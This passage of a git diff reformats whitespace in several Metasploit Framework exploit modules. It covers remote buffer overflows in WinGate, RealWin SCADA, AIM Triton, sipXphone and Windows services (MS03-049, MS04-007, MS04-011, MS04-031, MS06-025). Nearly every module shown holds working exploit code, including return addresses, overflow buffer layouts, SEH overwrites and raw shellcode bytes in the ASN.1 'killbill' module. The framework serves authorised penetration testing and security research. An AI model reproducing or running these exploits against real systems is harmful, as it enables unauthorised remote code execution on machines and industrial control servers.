0x03b1e121 } ], # GKService.exe ], - 'Privileged' => true, - 'DisclosureDate' => 'Feb 23 2004', - 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(3128) - ], self.class) + register_options( + [ + Opt::RPORT(3128) + ], self.class) end def exploit @@ -70,13 +64,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - sploit = "GET /" + rand_text_english(3603, payload_badchars) - sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) - sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n" + sploit = "GET /" + rand_text_english(3603, payload_badchars) + sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) + sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n" sock.put(sploit) sock.get_once(-1, 3) - + handler disconnect end diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index ff94ec027f..3ce78790f8 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Qbik WinGate WWW Proxy Server URL Processing Overflow', 'Description' => %q{ This module exploits a stack overflow in Qbik WinGate version - 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the - HTTP proxy service on port 80, a remote attacker could overflow - a buffer and execute arbitrary code. + 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the + HTTP proxy service on port 80, a remote attacker could overflow + a buffer and execute arbitrary code. }, 'Author' => 'patrick', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-2926' ], [ 'OSVDB', '26214' ], [ 'BID', '18312' ], @@ -56,10 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 07 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(80) - ], self.class) + register_options( + [ + Opt::RPORT(80) + ], self.class) end def check diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index a28e23f6ee..c05804c920 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -1,14 +1,16 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'DATAC RealWin SCADA Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in DATAC Control - International RealWin SCADA Server 2.0 (Build 6.0.10.37). - By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, - an attacker may be able to execute arbitrary code. + International RealWin SCADA Server 2.0 (Build 6.0.10.37). + By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, + an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-4322' ], [ 'OSVDB', '48606' ], [ 'BID', '31418' ], @@ -51,26 +53,25 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 26 2008')) - register_options([Opt::RPORT(910)], self.class) - + register_options([Opt::RPORT(910)], self.class) end def exploit connect - + data = [0x67542310].pack('V') data << [0x00000800].pack('V') data << [0x000a77e3].pack('V') data << [0x00040005].pack('V') - data << "\x00\x00" - data << make_nops(target['Offset']) + data << "\x00\x00" + data << make_nops(target['Offset']) data << [target.ret].pack('V') data << [0x00404040].pack('V') - data << payload.encoded + data << payload.encoded data << make_nops(1024) - - print_status("Trying target #{target.name}...") - sock.get_once + + print_status("Trying target #{target.name}...") + sock.get_once sock.put(data) handler diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 8c332ede6a..91568b00f6 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,16 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in AOL's AIM - Triton 1.0.4. By sending an overly long CSeq value, - a remote attacker could overflow a buffer and execute - arbitrary code on the system with the privileges of - the affected application. + This module exploits a buffer overflow in AOL\'s AIM + Triton 1.0.4. By sending an overly long CSeq value, + a remote attacker could overflow a buffer and execute + arbitrary code on the system with the privileges of + the affected application. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-3524'], ['OSVDB', '27122' ], ['BID', '18906'], @@ -50,24 +48,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll + [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll ], 'Privileged' => false, 'DisclosureDate' => 'July 10 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(5061) - ], self) - + register_options( + [ + Opt::RPORT(5061) + ], self.class) end def exploit connect_udp user = rand_text_english(2, payload_badchars) - port = rand(65535).to_s + port = rand(65535).to_s filler = rand_text_english(792, payload_badchars) seh = generate_seh_payload(target.ret) filler[780, seh.length] = seh @@ -82,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n" print_status("Trying target #{target.name}...") - + udp_sock.put(sploit) handler disconnect_udp - + end end diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 64d45a653b..2457b14cc6 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,16 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow', 'Description' => %q{ - This module exploits a buffer overflow in SIPfoundry's + This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, - a remote attacker could overflow a buffer and execute - arbitrary code on the system with the privileges of - the affected application. + a remote attacker could overflow a buffer and execute + arbitrary code on the system with the privileges of + the affected application. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-3524'], ['OSVDB', '27122'], ['BID', '18906'], @@ -48,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - + 'Targets' => [ - ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ], + ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ], ], 'Privileged' => false, diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index cf9ad7e303..f11d58e606 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,19 +21,19 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in SIPfoundry's - sipXphone 2.6.0.27. By sending an overly long CSeq value, - a remote attacker could overflow a buffer and execute - arbitrary code on the system with the privileges of - the affected application. + This module exploits a buffer overflow in SIPfoundry's + sipXphone 2.6.0.27. By sending an overly long CSeq value, + a remote attacker could overflow a buffer and execute + arbitrary code on the system with the privileges of + the affected application. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2006-3524'], - ['OSVDB', '27122'], - ['BID', '18906'], + 'References' => + [ + [ 'CVE', '2006-3524' ], + [ 'OSVDB', '27122' ], + [ 'BID', '18906' ], ], 'DefaultOptions' => { @@ -50,24 +48,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ], + [ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ], ], 'Privileged' => false, 'DisclosureDate' => 'July 10 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(5060) - ], self) - + register_options( + [ + Opt::RPORT(5060) + ], self.class) end def exploit connect_udp user = rand_text_english(2, payload_badchars) - port = rand(65535).to_s + port = rand(65535).to_s filler = rand_text_english(212, payload_badchars) seh = generate_seh_payload(target.ret) filler[204, seh.length] = seh @@ -82,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n" print_status("Trying target #{target.name}...") - + udp_sock.put(sploit) handler disconnect_udp - + end end diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 5b584ca598..a016543fda 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -3,34 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow', 'Description' => %q{ - This module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName + This module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP. }, - 'Author' => - [ - 'hdm' - ], + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => @@ -46,55 +40,53 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Privileged' => true, 'Payload' => - { + { 'Space' => 1000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'), 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'DefaultTarget' => 0, - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP0/SP1', + [ 'Windows XP SP0/SP1', { 'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll - } + } ], ], - 'DisclosureDate' => 'Nov 11 2003')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']), ], self.class) - end - def exploit + def exploit connect() smb_login() handle = dcerpc_handle( - '6bffd098-a112-3610-9833-46c3f87e345a', '1.0', + '6bffd098-a112-3610-9833-46c3f87e345a', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) - + print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") - print_status("Building the stub data...") - - + print_status("Building the stub data...") + + name = rand_text_alphanumeric(5000) name[3496, 4] = [target.ret].pack('V') name[3492, 2] = "\xeb\x06" name[3500, 5] = "\xe9" + [-3505].pack('V') name[0, payload.encoded.length] = payload.encoded - stub = + stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") + NDR.long(rand(0xffffffff)) + @@ -103,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote NDR.UnicodeConformantVaryingString('') + NDR.long(0) + NDR.long(0) - + print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x1b, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index d5e1990295..b982ad83ff 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ - This is an exploit for a previously undisclosed + This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory @@ -37,11 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. - + This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. - + }, 'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => GPL_LICENSE, @@ -58,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread' - }, + }, 'Privileged' => true, 'Payload' => { @@ -66,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', @@ -77,11 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) - + register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), - ], self.class) + ], self.class) end # This exploit is too destructive to use during automated exploitation. @@ -96,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote # a non-GPL application. -hdm[at]metasploit.com def exploit - + # The first stage shellcode fixes the PEB pointer and cleans the heap - stage0 = + stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ @@ -124,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) - + case datastore['PROTO'] when 'smb' exploit_smb(token) @@ -134,11 +132,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Invalid application protocol specified, use smb or http") end end - - + + def exploit_smb(token) connect - + client = Rex::Proto::SMB::Client.new(sock) begin @@ -152,33 +150,33 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end end - + handler disconnect end - + def exploit_http(token) connect - + req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once - + if (res and res =~ /0x80090301/) print_status("This server does not support the Negotiate protocol or has already been exploited") end - + if (res and res =~ /0x80090304/) print_status("This server responded with error code 0x80090304 (wth?)") - end - + end + handler disconnect end - + # Returns an ASN.1 encoded string def enc_asn1(str) @@ -197,25 +195,25 @@ class Metasploit3 < Msf::Exploit::Remote # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) - + if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end - + if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end - + tag = "\x90\x42\x90\x42\x90\x42\x90\x42" - + if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end - - + + # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second @@ -223,13 +221,13 @@ class Metasploit3 < Msf::Exploit::Remote fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" - + # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB - - bitstring = enc_constr( + + bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( @@ -244,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote ) ) ) - + token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) @@ -255,8 +253,8 @@ class Metasploit3 < Msf::Exploit::Remote ) ) ) - - return token + + return token end end diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 690c48475a..4d641bd946 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -3,32 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module exploits a vulnerability in the LSASS service # - include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the LSASS service, this vulnerability + This module exploits a stack overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. @@ -55,33 +51,33 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Automatic - [ + [ 'Automatic Targetting', { 'Rets' => [ ], }, ], # Windows 2000 - [ + [ 'Windows 2000 English', { 'Rets' => [ 0x773242e0 ], }, ], # Windows XP - [ + [ 'Windows XP English', { 'Rets' => [ 0x7449bf1a ], }, - ], + ], ], 'DefaultTarget' => 0)) end - + def exploit connect() @@ -93,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Bound to #{handle}...") print_status('Getting OS information...') - + # Check the remote OS name and version os = smb_peer_os buff = '' @@ -103,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote # and give us a nice set of registers which point back to # the un-unicoded data. We simply return to a nop sled that # jumps over the return address, some trash, and into the - # final payload. Easy as pie. + # final payload. Easy as pie. when /Windows 5\.0/ str = rand_text_alphanumeric(3500) str[2020, 4] = [targets[1]['Rets'][0]].pack('V') @@ -115,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote # eight byte segment at the end of our buffer in memory, # we make these bytes jump back to the beginning of the # buffer, giving us about 1936 bytes of space for a - # payload. + # payload. when /Windows 5\.1/ str = rand_text_alphanumeric(7000) + "\x00\x00" str[0, payload.encoded.length ] = payload.encoded @@ -130,24 +126,24 @@ class Metasploit3 < Msf::Exploit::Remote return end - stub = buff + - NDR.long(rand(0xFFFFFF)) + + stub = buff + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xFFFFFF)) + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xFFFFFF)) + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xFFFFFF)) + + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + - rand_text(528) + - rand_text(528) + + rand_text(528) + + rand_text(528) + NDR.long(rand(0xFFFFFF)) print_status("Trying to exploit #{os}") - + begin response = dcerpc_call(9, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 1d93f3e9ec..8abcceeaad 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft NetDDE Service Overflow', 'Description' => %q{ - This module exploits a stack overflow in the NetDDE service, which is the + This module exploits a stack overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit effects only operating systems released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim that this vulnerability can be exploited without authentication, the NDDEAPI @@ -36,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2004-0206'], [ 'OSVDB', '10689'], - [ 'BID', '11372'], + [ 'BID', '11372'], [ 'MSB', 'MS04-031'], ], @@ -52,31 +50,32 @@ class Metasploit3 < Msf::Exploit::Remote 'Prepend' => 'A' * 8, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ], # push esp, ret :) ], 'DefaultTarget' => 0)) + register_options( - [ + [ OptString.new('SMBPIPE', [ true, "The pipe name to use (nddeapi)", 'nddeapi']), - ], self.class) + ], self.class) end def exploit connect() smb_login() print_status("Trying target #{target.name}...") - + handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle}") dcerpc_bind(handle) print_status("Bound to #{handle}") - retOverWrite = + retOverWrite = 'AA' + (NDR.long(target.ret) * 133) + payload.encoded - overflowChunk = + overflowChunk = retOverWrite + NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null. NDR.long(0x0) diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 4762d79938..cef78b2495 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -24,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow', 'Description' => %q{ - This module exploits a registry-based stack overflow in the Windows Routing + This module exploits a registry-based stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. @@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook - }, + }, 'Author' => [ 'pusscat', 'hdm' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', @@ -63,6 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi ], 'DefaultTarget' => 0)) + register_options( [ OptString.new('SMBPIPE', [ true, "Rawr.", 'router']), @@ -108,64 +107,64 @@ class Metasploit3 < Msf::Exploit::Remote # Overwrite the SEH ptr, even though ESP is smashed # The handle after the ret must be an invalid address - pat = + pat = (fil * 886) + NDR.long(target.ret) + (fil * 3) + "\xc0" + bof - type2 = + type2 = NDR.string( (fil * 1024) + "\x00" ) + NDR.string( pat + "\x00" ) + NDR.string( (fil * 4096) + "\x00" ) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) - type1 = - NDR.long(rand(0xffffffff)) + # OperatorDial - NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber - NDR.long(rand(0xffffffff)) + # UseLocation - NDR.long(rand(0xffffffff)) + # ShowLights - NDR.long(rand(0xffffffff)) + # ShowConnectStatus - NDR.long(rand(0xffffffff)) + # CloseOnDial - NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits - NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits - NDR.long(rand(0xffffffff)) + # SkipConnectComplete - NDR.long(rand(0xffffffff)) + # NewEntryWizard - NDR.long(rand(0xffffffff)) + # RedialAttempts - NDR.long(rand(0xffffffff)) + # RedialSeconds - NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds - NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure - NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing - NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery - NDR.long(rand(0xffffffff)) + # CallbackMode + type1 = + NDR.long(rand(0xffffffff)) + # OperatorDial + NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber + NDR.long(rand(0xffffffff)) + # UseLocation + NDR.long(rand(0xffffffff)) + # ShowLights + NDR.long(rand(0xffffffff)) + # ShowConnectStatus + NDR.long(rand(0xffffffff)) + # CloseOnDial + NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits + NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits + NDR.long(rand(0xffffffff)) + # SkipConnectComplete + NDR.long(rand(0xffffffff)) + # NewEntryWizard + NDR.long(rand(0xffffffff)) + # RedialAttempts + NDR.long(rand(0xffffffff)) + # RedialSeconds + NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds + NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure + NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing + NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery + NDR.long(rand(0xffffffff)) + # CallbackMode - NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc - NDR.wstring("\x00" * 129) + - NDR.long(rand(0xffffffff)) + - NDR.wstring("\x00" * 520) + - NDR.wstring("\x00" * 520) + - - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - - NDR.string("\x00" * 514) + + NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc + NDR.wstring("\x00" * 129) + + NDR.long(rand(0xffffffff)) + + NDR.wstring("\x00" * 520) + + NDR.wstring("\x00" * 520) + NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + + NDR.string("\x00" * 514) + + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) stubdata = type1 + NDR.long(rand(0xffffffff)) + eggdata - print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') + print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') begin print_status('Creating the malicious registry key...') diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 6eca1389e0..e474e097f6 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -3,33 